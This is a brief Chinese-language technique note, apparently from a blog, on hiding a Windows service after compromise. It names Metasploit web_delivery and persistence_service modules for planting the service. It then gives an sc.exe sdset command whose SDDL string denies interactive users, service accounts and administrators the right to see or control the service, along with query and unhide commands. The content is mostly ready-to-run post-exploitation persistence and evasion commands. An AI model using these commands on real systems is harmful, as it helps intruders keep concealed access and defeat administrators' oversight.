隐藏服务-sddl
服务 隐藏
2023-06-13 09:13:37 时间
use exploit/multi/script/web_delivery
use exploit/windows/local/persistence_service
cmd:
sc query cqvsfn
sc qc cqvsfn
powershell:
get-service -name cqvsfn
Joshua Wright提供的方法使用sc 命令的sdset模块可以修改服务的安全描述符:
SDDL隐藏
cmd:(隐藏服务)
sc.exe sdset cqvsfn "D:(D;;DCLCWPDTSDCC;;;IU)(D;;DCLCWPDTSDCC;;;SU)(D;;DCLCWPDTSDCC;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
powershell:(取消隐藏)
& $env:SystemRoot\System32\sc.exe sdset cqvsfn "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
https://learn.microsoft.com/en-us/sysinternals/downloads/accesschk